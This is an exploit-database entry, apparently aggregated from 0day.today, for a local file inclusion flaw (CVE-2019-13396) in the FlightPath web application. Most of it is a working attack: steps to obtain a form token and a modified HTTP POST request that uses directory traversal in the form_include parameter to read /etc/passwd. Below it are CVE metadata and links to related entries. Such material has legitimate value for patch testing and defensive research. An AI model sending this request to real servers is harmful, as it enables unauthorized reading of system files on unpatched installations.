Lucene search
Mohammed Althibyani1337DAY-ID-32986HistoryJul 16, 2019 - 12:00 a.m.
FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion Vulnerability
2019-07-1600:00:00
Mohammed Althibyani
0day.today
13
0.048 Low
EPSS
Percentile
92.8%
Exploit for php platform in category web applications
# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
# Exploit Author: Mohammed Althibyani
# Vendor Homepage: http://getflightpath.com
# Software Link: http://getflightpath.com/project/9/releases
# Version: < 4.8.2 & < 5.0-rc2
# Tested on: Kali Linux
# CVE : CVE-2019-13396
# Parameters : include_form
# POST Method:
use the login form to get right form_token [ you can use wrong user/pass ]
This is how to POST looks like:
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D¤t_student_id=&user=test&password=test&btn_submit=Login
# modfiy the POST request to be:
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
# Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.
# 0day.today [2019-12-04] #Related
exploitpack
exploitpack
FlightPath 4.8.2 5.0-rc2 - Local File Inclusion
2019-07-15 00:00:00
cve
cve
CVE-2019-13396
2019-07-10 14:15:11
packetstorm
packetstorm
FlightPath Local File Inclusion
2019-07-15 00:00:00
nuclei
nuclei
FlightPath - Local File Inclusion
2022-01-10 23:58:14
nvd
nvd
CVE-2019-13396
2019-07-10 14:15:11
prion
prion
Directory traversal
2019-07-10 14:15:00
cvelist
cvelist
CVE-2019-13396
2019-07-10 13:45:05
exploitdb
exploitdb
FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion
2019-07-15 00:00:00